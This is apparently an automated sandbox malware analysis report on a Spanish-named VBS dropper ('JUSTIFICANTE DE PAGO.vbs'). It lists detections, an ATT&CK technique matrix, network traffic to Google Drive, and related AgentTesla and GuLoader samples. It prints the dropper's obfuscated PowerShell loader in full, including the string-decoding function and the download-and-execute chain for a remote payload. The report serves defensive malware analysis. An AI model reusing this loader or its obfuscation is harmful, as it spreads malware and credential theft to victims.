annalzani.skobbeekont,n,ncom; nonw ');popess (agonothet 'brugeibassefarbej tour(restptg auceant ssswerdtrela.-gondoptailgakontotusitah hnge bifoktaksle:fanci\knickcfodtulrevoluor.ogs af.ot,npreeyngstrv venybitte.rovdytsalamxomnortbores)behan{ ek.eechillxtele,i .trut unl,} slu ;l,vsf ');$julegavens = agonothet ' bek esheracunwirhvr.stobehnd unmuz%anke,aorigepbagr.p .ndhdgy,noaper itperspakomed% fixu\tocortb,boer forhaharoln brunghan,lsgyptet,arkfimictul pseufmilielvapordmanteemessi. lophpcerbeetabacrsam.m sigh,& f.br&socio len.ie,oritcjagtsh.oraloinfan sala$nigri ';popess (agonothet 'm,lkm$statsgerhvel crunospickbwheezaichull h rd:solioc,estuo exosnpromisdonnatgenbra tsa,n ejfntplateirandba shas unh,=indig(skdebc rancmfrontdgenma .irc/ deklcpres. negle$elverjhavaruforsrl,mberer.eumginva,azendovspi.ieratepnhelfls f rt)g ucu ');popess (agonothet 'ju,ef$dob,egant.gl siesoinddabthalaaomforlmica.:dragesvand.lnatur
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "$karyokinesis104 = 1;$unrefracting='substrin';$unrefracting+='g';function agonothet($haandgribelige){$judiciousness=$haandgribelige.length-$karyokinesis104;for($organoleptically=5; $organoleptically -lt $judiciousness; $organoleptically+=(6)){$bundlses+=$haandgribelige.$unrefracting.invoke($organoleptically, $karyokinesis104);}$bundlses;}function popess($rdstjerternes){& ($speecher) ($rdstjerternes);}$stentrykkerierne=agonothet 'suspimstaccounvigzoverli ,ntolquainl degeapaste/arabi5strat.in.er0v,cci petit(mo,igw und,id armn c brdradioostraawpharys.yldi tilstnafhjetcanad skov1s,edi0 min..h nds0 pant;svend ne.pawbivalipaveknposts6se,ip4poro.;plebi conatxhuele6 gras4servi;sonny ,ivvargeckovshipp: dans1 ulmu2runen1 pro .br.sn0 fina)se vt unde gforstedesinchansgkbelonoforh./epose2atmoc0nedve1float0missi0vigne1harce0 gang1pte o .egynfendl ikonverpanerekruspf x.loo distxabdu./klass1 fr.m2chink1auten.l.del0rulle ';$untestable27=agonothet ' polyutarogs,onheejobs r,okse-ted ia olymgunhanesagitnmattetdanse ';$mblements=agonothet 'befryhun ertgr.fit tagsppul,os.jtad:macro/t,edo/ na.udbascurshippichangvauxinebegrn. a isgprimeolovbeo t rng stralgoogoed fer.evighcsusp,ofr semdeg,a/agftaulea hctppeb?.asimeflavoxtautop tremo natur,irketagerk=piet.dvindiospisewdespinpaakllfishsoel,esamo.aidhiela&outgli .lgedrusti=seign1 udstp quen8 overcafblaaka hi5i.terishawiwskovrvafparrs.icigintragarrhigrtenjedemargleptobjo,glhbolst5 s.rjjtillgtgens.5 termsparosaovern7tingeb .kstzstilpddk,eniascesw fo.wacolu.7 lazadfemgrewaggo ';$gashes=agonothet 'vekse> tlle ';$speecher=agonothet 'gl.cyitr.nseekspoxs,ibs ';$hjemgivelsen='drfyldingen';popess (agonothet 'sam.usretateo,pebtducti-kangac li sogrundnensomtozon.estratnileitt dank p.ri-besaap kan.aprefat alfah tora kismtdrmm.:halm \ ullec ghosl whalu le.nsdomnetrewineaccesr,necdylands.fejlutnonauxcamayt.unkt ubud -binapvovermaakti.l billuunparepr.in rubri$jackahinaprjjer.beastr,mscenag rolliband.vrecule annalzani.skobbeekont,n,ncom; nonw ');popess (agonothet 'brugeibassefarbej tour(restptg auceant ssswerdtrela.-gondoptailgakontotusitah hnge bifoktaksle:fanci\knickcfodtulrevoluor.ogs af.ot,npreeyngstrv venybitte.rovdytsalamxomnortbores)behan{ ek.eechillxtele,i .trut unl,} slu ;l,vsf ');$julegavens = agonothet ' bek esheracunwirhvr.stobehnd unmuz%anke,aorigepbagr.p .ndhdgy,noaper itperspakomed% fixu\tocortb,boer forhaharoln brunghan,lsgyptet,arkfimictul pseufmilielvapordmanteemessi. lophpcerbeetabacrsam.m sigh,& f.br&socio len.ie,oritcjagtsh.oraloinfan sala$nigri ';popess (agonothet 'm,lkm$statsgerhvel crunospickbwheezaichull h rd:solioc,estuo exosnpromisdonnatgenbra tsa,n ejfntplateirandba shas unh,=indig(skdebc rancmfrontdgenma .irc/ deklcpres. negle$elverjhavaruforsrl,mberer.eumginva,azendovspi.ieratepnhelfls f rt)g ucu ');popess (agonothet 'ju,ef$dob,egant.gl siesoinddabthalaaomforlmica.:dragesvand.lnaturJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information221
Scripting		Valid Accounts11
Command and Scripting Interpreter		221
Scripting		11
Process Injection		1
Masquerading		OS Credential Dumping1
Security Software Discovery		Remote ServicesData from Local System1
Encrypted Channel		Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault Accounts1
Exploitation for Client Execution		1
DLL Side-Loading		1
DLL Side-Loading		21
Virtualization/Sandbox Evasion		LSASS Memory1
Process Discovery		Remote Desktop ProtocolData from Removable Media1
Ingress Tool Transfer		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain Accounts2
PowerShell		Logon Script (Windows)Logon Script (Windows)11
Process Injection		Security Account Manager21
Virtualization/Sandbox Evasion		SMB/Windows Admin SharesData from Network Shared Drive2
Non-Application Layer Protocol		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
Obfuscated Files or Information		NTDS1
Application Window Discovery		Distributed Component Object ModelInput Capture13
Application Layer Protocol		Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
Software Packing		LSA Secrets1
File and Directory Discovery		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
DLL Side-Loading		Cached Domain Credentials12
System Information Discovery		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
JUSTIFICANTE DE PAGO.vbs5%ReversingLabsWin32.Dropper.Generic
JUSTIFICANTE DE PAGO.vbs10%VirustotalBrowse

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
http://pesterbdd.com/images/Pester.png100%URL Reputationmalware
http://pesterbdd.com/images/Pester.png100%URL Reputationmalware
https://go.micro0%URL Reputationsafe
https://contoso.com/0%URL Reputationsafe
https://contoso.com/License0%URL Reputationsafe
https://contoso.com/Icon0%URL Reputationsafe
https://drive.googP0%Avira URL Cloudsafe
https://drive.usercontent.google.comX10%Avira URL Cloudsafe
https://drive.usercontent.googh0%Avira URL Cloudsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
drive.google.com
142.250.101.138
truefalse
    		high
    drive.usercontent.google.com
    		142.251.2.132
    		truefalse
      		high

      URLs from Memory and Binaries

      NameSourceMaliciousAntivirus DetectionReputation
      https://drive.usercontent.google.comX1powershell.exe, 00000002.00000002.1347362979.000001D944A30000.00000004.00000800.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      		unknown
      https://www.google.compowershell.exe, 00000002.00000002.1347362979.000001D944A42000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1347362979.000001D94670C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1347362979.000001D944A12000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1347362979.000001D944A30000.00000004.00000800.00020000.00000000.sdmpfalse
        		high
        http://nuget.org/NuGet.exepowershell.exe, 00000002.00000002.1370143781.000001D9546A5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1370143781.000001D954562000.00000004.00000800.00020000.00000000.sdmpfalse
          		high
          http://drive.usercontent.google.compowershell.exe, 00000002.00000002.1347362979.000001D94671F000.00000004.00000800.00020000.00000000.sdmpfalse
            		high
            http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000002.00000002.1347362979.000001D944719000.00000004.00000800.00020000.00000000.sdmptrue
            • URL Reputation: malware
            • URL Reputation: malware
            		unknown
            http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000002.00000002.1347362979.000001D944719000.00000004.00000800.00020000.00000000.sdmpfalse
              		high
              https://go.micropowershell.exe, 00000002.00000002.1347362979.000001D94587B000.00000004.00000800.00020000.00000000.sdmptrue
              • URL Reputation: safe
              		unknown
              https://contoso.com/powershell.exe, 00000002.00000002.1370143781.000001D954562000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              		unknown
              https://nuget.org/nuget.exepowershell.exe, 00000002.00000002.1370143781.000001D9546A5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1370143781.000001D954562000.00000004.00000800.00020000.00000000.sdmpfalse
                		high
                https://contoso.com/Licensepowershell.exe, 00000002.00000002.1370143781.000001D954562000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                https://contoso.com/Iconpowershell.exe, 00000002.00000002.1370143781.000001D954562000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                https://drive.googPpowershell.exe, 00000002.00000002.1347362979.000001D94652E000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://drive.google.compowershell.exe, 00000002.00000002.1347362979.000001D94652E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1347362979.000001D944719000.00000004.00000800.00020000.00000000.sdmpfalse
                  		high
                  https://drive.usercontent.googhpowershell.exe, 00000002.00000002.1347362979.000001D94670C000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://drive.usercontent.google.compowershell.exe, 00000002.00000002.1347362979.000001D94670C000.00000004.00000800.00020000.00000000.sdmpfalse
                    		high
                    http://drive.google.compowershell.exe, 00000002.00000002.1347362979.000001D9466E6000.00000004.00000800.00020000.00000000.sdmpfalse
                      		high
                      https://aka.ms/pscore68powershell.exe, 00000002.00000002.1347362979.000001D9444F1000.00000004.00000800.00020000.00000000.sdmpfalse
                        		high
                        https://apis.google.compowershell.exe, 00000002.00000002.1347362979.000001D944A42000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1347362979.000001D94670C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1347362979.000001D944A12000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1347362979.000001D944A30000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high
                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000002.00000002.1347362979.000001D9444F1000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            https://github.com/Pester/Pesterpowershell.exe, 00000002.00000002.1347362979.000001D944719000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high

                              World Map of Contacted IPs

                              • No. of IPs < 25%
                              • 25% < No. of IPs < 50%
                              • 50% < No. of IPs < 75%
                              • 75% < No. of IPs

                              Public IPs

                              IPDomainCountryFlagASNASN NameMalicious
                              142.250.101.138
                              		drive.google.comUnited States
                              		15169GOOGLEUSfalse
                              142.251.2.132
                              		drive.usercontent.google.comUnited States
                              		15169GOOGLEUSfalse

                              General Information

                              Joe Sandbox version:40.0.0 Tourmaline
                              Analysis ID:1430767
                              Start date and time:2024-04-24 07:00:34 +02:00
                              Joe Sandbox product:CloudBasic
                              Overall analysis duration:0h 4m 26s
                              Hypervisor based Inspection enabled:false
                              Report type:full
                              Cookbook file name:default.jbs
                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                              Number of analysed new started processes analysed:15
                              Number of new started drivers analysed:0
                              Number of existing processes analysed:0
                              Number of existing drivers analysed:0
                              Number of injected processes analysed:0
                              Technologies:
                              • HCA enabled
                              • EGA enabled
                              • AMSI enabled
                              Analysis Mode:default
                              Analysis stop reason:Timeout
                              Sample name:JUSTIFICANTE DE PAGO.vbs
                              Detection:MAL
                              Classification:mal100.expl.evad.winVBS@6/4@2/2
                              EGA Information:Failed
                              HCA Information:Failed
                              Cookbook Comments:
                              • Found application associated with file extension: .vbs

                              Warnings

                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, Sgrmuserer.exe, conhost.exe, svchost.exe
                              • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                              • Execution Graph export aborted for target powershell.exe, PID 7420 because it is empty
                              • Not all processes where analyzed, report is missing behavior information
                              • Report size getting too big, too many NtOpenKeyEx calls found.
                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                              • Report size getting too big, too many NtQueryValueKey calls found.

                              Simulations

                              Behavior and APIs

                              TimeTypeDescription
                              07:01:22API Interceptor46x Sleep call for process: powershell.exe modified

                              Joe Sandbox View / Context

                              IPs

                              No context

                              Domains

                              No context

                              ASNs

                              No context

                              JA3 Fingerprints

                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              3b5074b1b5d032e5620f69f9f700ff0eJUSTIFICANTE DE PAGO.vbsGet hashmaliciousUnknownBrowse
                              • 142.251.2.132
                              • 142.250.101.138
                              orden de compra.vbsGet hashmaliciousAgentTeslaBrowse
                              • 142.251.2.132
                              • 142.250.101.138
                              FT. 40FE CNY .xlsx.lnkGet hashmaliciousAgentTesla, DBatLoader, PureLog Stealer, RedLineBrowse
                              • 142.251.2.132
                              • 142.250.101.138
                              DHL Shipping doc.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                              • 142.251.2.132
                              • 142.250.101.138
                              G4-TODOS.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                              • 142.251.2.132
                              • 142.250.101.138
                              Reconfirm Details.vbsGet hashmaliciousAgentTeslaBrowse
                              • 142.251.2.132
                              • 142.250.101.138
                              purchase order pdf.exeGet hashmaliciousAgentTeslaBrowse
                              • 142.251.2.132
                              • 142.250.101.138
                              PO 23JC0704-Rollease-B.exeGet hashmaliciousAgentTeslaBrowse
                              • 142.251.2.132
                              • 142.250.101.138
                              3Shape Unite Installer.exeGet hashmaliciousUnknownBrowse
                              • 142.251.2.132
                              • 142.250.101.138
                              ScreenConnect.Client.exeGet hashmaliciousScreenConnect ToolBrowse
                              • 142.251.2.132
                              • 142.250.101.138

                              Dropped Files

                              No context

                              Created / dropped Files

                              C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                              Download File
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):64
                              Entropy (8bit):1.1940658735648508
                              Encrypted:false
                              SSDEEP:3:NlllulJnp/p:NllU
                              MD5:BC6DB77EB243BF62DC31267706650173
                              SHA1:9E42FEFC2E92DE0DB2A2C9911C866320E41B30FF
                              SHA-256:5B000939E436B6D314E3262887D8DB6E489A0DDF1E10E5D3D80F55AA25C9FC27
                              SHA-512:91DC4935874ECA2A4C8DE303D83081FE945C590208BB844324D1E0C88068495E30AAE2321B3BA8A762BA08DAAEB75D9931522A47C5317766C27E6CE7D04BEEA9
                              Malicious:false
                              Reputation:moderate, very likely benign file
                              Preview:@...e.................................X..............@..........

                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1cadvkh4.xq1.ps1

                              Download File
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:ASCII text, with no line terminators
                              Category:dropped
                              Size (bytes):60
                              Entropy (8bit):4.038920595031593
                              Encrypted:false
                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                              Malicious:false
                              Reputation:high, very likely benign file
                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ytfrpog2.4mu.psm1

                              Download File
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:ASCII text, with no line terminators
                              Category:dropped
                              Size (bytes):60
                              Entropy (8bit):4.038920595031593
                              Encrypted:false
                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                              Malicious:false
                              Reputation:high, very likely benign file
                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                              C:\Users\user\AppData\Roaming\Trangstilflde.Per

                              Download File
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:HTML document, ASCII text, with very long lines (1692), with no line terminators
                              Category:dropped
                              Size (bytes):1692
                              Entropy (8bit):5.113342353195585
                              Encrypted:false
                              SSDEEP:24:hazspwblvhXlhEG0qnXXX08Ucq9J8mZoWHMzj+cB7jTsoT9FyVZ81wmna:7pumRq+fjsueFYaWJ
                              MD5:F72C0F8A7FD3C03978E09A97BB318A75
                              SHA1:0FBFD436414CF6A55C331D18C30F09E683D34C58
                              SHA-256:B2EF63BC335205DF5D77E2D3E58808B11A95F4F0AFC80CE28744EBC1A992E4CF
                              SHA-512:19DCFCC8BFA32B058AFB322DF672F1072BD485B12007D9F130AF410746F9DE0FC6890139E5A15F7E703A53BC81D84912FD6CF565A52469F0D1A793E94ABBD862
                              Malicious:false
                              Reputation:low
                              Preview:<!DOCTYPE html><html><head><title>Google Drive - Infected file</title><meta http-equiv="content-type" content="text/html; charset=utf-8"/><style nonce="MEFqeyJUdqRLIbBN-IqPsw">.goog-link-button{position:relative;color:#15c;text-decoration:underline;cursor:pointer}.goog-link-button-disabled{color:#ccc;text-decoration:none;cursor:default}body{color:#222;font:normal 13px/1.4 arial,sans-serif;margin:0}.grecaptcha-badge{visibility:hidden}.uc-main{padding-top:50px;text-align:center}#uc-dl-icon{display:inline-block;margin-top:16px;padding-right:1em;vertical-align:top}#uc-text{display:inline-block;max-width:68ex;text-align:left}.uc-error-caption,.uc-warning-caption{color:#222;font-size:16px}#uc-download-link{text-decoration:none}.uc-name-size a{color:#15c;text-decoration:none}.uc-name-size a:visited{color:#61c;text-decoration:none}.uc-name-size a:active{color:#d14836;text-decoration:none}.uc-footer{color:#777;font-size:11px;padding-bottom:5ex;padding-top:5ex;text-align:center}.uc-footer a{colo

                              Static File Info

                              General

                              File type:ASCII text, with very long lines (363), with CRLF line terminators
                              Entropy (8bit):5.360521611728459
                              TrID:
                              • Visual Basic Script (13500/0) 100.00%
                              File name:JUSTIFICANTE DE PAGO.vbs
                              File size:8'223 bytes
                              MD5:fdf5dceb2d284e54cf0a421a463b621d
                              SHA1:e5f7ec649576934ac61090f1380d23b9d2ac5d09
                              SHA256:0923a2d6d1c333ebd0f4320b2fe23015ecf70f3ebeb5a89d883b8259869d4743
                              SHA512:a7af097d89597788c1f5f368dc5df4430efdb1315034b4790610d681284af2cb73d5d7627fcf8c6048558c2149ce553b2f9ac1d4ddc4aa84207644240ca51281
                              SSDEEP:192:3xbypOqPkZz+5xE1Naq+wtwFBsaqOaJA8Z/cDWzNZWiEtM0J:hblIiblwHsa3a/FcriEtv
                              TLSH:02022B1F2B2724794BA30A74D8C739010634147EF22E1A7FF65487AAAF5B7D8206A75C
                              File Content Preview:.. ..Function Nolo ......Sa4 = Sa4 & "$Karyokinesis104 = 1;$Unrefracting='Substrin';$Unrefracting+='g';Function Agonothet($Haandgribelige){$Judiciousness=$Haandgribelige.Length-$Karyokinesis104;For($organoleptically=5; $organoleptically -lt $Judiciousness

                              File Icon

                              Icon Hash:68d69b8f86ab9a86

                              Network Behavior

                              Network Port Distribution

                              TCP Packets

                              TimestampSource PortDest PortSource IPDest IP
                              Apr 24, 2024 07:01:24.415484905 CEST49705443192.168.2.10142.250.101.138
                              Apr 24, 2024 07:01:24.415520906 CEST44349705142.250.101.138192.168.2.10
                              Apr 24, 2024 07:01:24.415591955 CEST49705443192.168.2.10142.250.101.138
                              Apr 24, 2024 07:01:24.424638987 CEST49705443192.168.2.10142.250.101.138
                              Apr 24, 2024 07:01:24.424654961 CEST44349705142.250.101.138192.168.2.10
                              Apr 24, 2024 07:01:24.787094116 CEST44349705142.250.101.138192.168.2.10
                              Apr 24, 2024 07:01:24.787293911 CEST49705443192.168.2.10142.250.101.138
                              Apr 24, 2024 07:01:24.788265944 CEST44349705142.250.101.138192.168.2.10
                              Apr 24, 2024 07:01:24.788336992 CEST49705443192.168.2.10142.250.101.138
                              Apr 24, 2024 07:01:24.791718006 CEST49705443192.168.2.10142.250.101.138
                              Apr 24, 2024 07:01:24.791733027 CEST44349705142.250.101.138192.168.2.10
                              Apr 24, 2024 07:01:24.791987896 CEST44349705142.250.101.138192.168.2.10
                              Apr 24, 2024 07:01:24.807866096 CEST49705443192.168.2.10142.250.101.138
                              Apr 24, 2024 07:01:24.848120928 CEST44349705142.250.101.138192.168.2.10
                              Apr 24, 2024 07:01:25.359215021 CEST44349705142.250.101.138192.168.2.10
                              Apr 24, 2024 07:01:25.359302998 CEST44349705142.250.101.138192.168.2.10
                              Apr 24, 2024 07:01:25.359441042 CEST49705443192.168.2.10142.250.101.138
                              Apr 24, 2024 07:01:25.361335039 CEST49705443192.168.2.10142.250.101.138
                              Apr 24, 2024 07:01:25.553509951 CEST49706443192.168.2.10142.251.2.132
                              Apr 24, 2024 07:01:25.553550005 CEST44349706142.251.2.132192.168.2.10
                              Apr 24, 2024 07:01:25.553611040 CEST49706443192.168.2.10142.251.2.132
                              Apr 24, 2024 07:01:25.580961943 CEST49706443192.168.2.10142.251.2.132
                              Apr 24, 2024 07:01:25.580990076 CEST44349706142.251.2.132192.168.2.10
                              Apr 24, 2024 07:01:25.942476988 CEST44349706142.251.2.132192.168.2.10
                              Apr 24, 2024 07:01:25.942589045 CEST49706443192.168.2.10142.251.2.132
                              Apr 24, 2024 07:01:25.945317030 CEST49706443192.168.2.10142.251.2.132
                              Apr 24, 2024 07:01:25.945327044 CEST44349706142.251.2.132192.168.2.10
                              Apr 24, 2024 07:01:25.945729017 CEST44349706142.251.2.132192.168.2.10
                              Apr 24, 2024 07:01:25.946618080 CEST49706443192.168.2.10142.251.2.132
                              Apr 24, 2024 07:01:25.988117933 CEST44349706142.251.2.132192.168.2.10
                              Apr 24, 2024 07:01:27.427581072 CEST44349706142.251.2.132192.168.2.10
                              Apr 24, 2024 07:01:27.427642107 CEST49706443192.168.2.10142.251.2.132
                              Apr 24, 2024 07:01:27.427651882 CEST44349706142.251.2.132192.168.2.10
                              Apr 24, 2024 07:01:27.427664042 CEST44349706142.251.2.132192.168.2.10
                              Apr 24, 2024 07:01:27.427725077 CEST44349706142.251.2.132192.168.2.10
                              Apr 24, 2024 07:01:27.427762032 CEST49706443192.168.2.10142.251.2.132
                              Apr 24, 2024 07:01:27.429258108 CEST49706443192.168.2.10142.251.2.132

                              UDP Packets

                              TimestampSource PortDest PortSource IPDest IP
                              Apr 24, 2024 07:01:24.255170107 CEST6226253192.168.2.101.1.1.1
                              Apr 24, 2024 07:01:24.408652067 CEST53622621.1.1.1192.168.2.10
                              Apr 24, 2024 07:01:25.362626076 CEST5350053192.168.2.101.1.1.1
                              Apr 24, 2024 07:01:25.531210899 CEST53535001.1.1.1192.168.2.10

                              DNS Queries

                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                              Apr 24, 2024 07:01:24.255170107 CEST192.168.2.101.1.1.10x2366Standard query (0)drive.google.comA (IP address)IN (0x0001)false
                              Apr 24, 2024 07:01:25.362626076 CEST192.168.2.101.1.1.10x9063Standard query (0)drive.usercontent.google.comA (IP address)IN (0x0001)false

                              DNS Answers

                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                              Apr 24, 2024 07:01:24.408652067 CEST1.1.1.1192.168.2.100x2366No error (0)drive.google.com142.250.101.138A (IP address)IN (0x0001)false
                              Apr 24, 2024 07:01:24.408652067 CEST1.1.1.1192.168.2.100x2366No error (0)drive.google.com142.250.101.101A (IP address)IN (0x0001)false
                              Apr 24, 2024 07:01:24.408652067 CEST1.1.1.1192.168.2.100x2366No error (0)drive.google.com142.250.101.100A (IP address)IN (0x0001)false
                              Apr 24, 2024 07:01:24.408652067 CEST1.1.1.1192.168.2.100x2366No error (0)drive.google.com142.250.101.102A (IP address)IN (0x0001)false
                              Apr 24, 2024 07:01:24.408652067 CEST1.1.1.1192.168.2.100x2366No error (0)drive.google.com142.250.101.139A (IP address)IN (0x0001)false
                              Apr 24, 2024 07:01:24.408652067 CEST1.1.1.1192.168.2.100x2366No error (0)drive.google.com142.250.101.113A (IP address)IN (0x0001)false
                              Apr 24, 2024 07:01:25.531210899 CEST1.1.1.1192.168.2.100x9063No error (0)drive.usercontent.google.com142.251.2.132A (IP address)IN (0x0001)false

                              HTTP Request Dependency Graph

                              • drive.google.com
                              • drive.usercontent.google.com

                              HTTPS Proxied Packets

                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              0192.168.2.1049705142.250.101.1384437420C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              TimestampBytes transferredDirectionData
                              2024-04-24 05:01:24 UTC215OUTGET /uc?export=download&id=1p8CA5IWVRgggeGBH5Jt5SA7bzDiwA7De HTTP/1.1
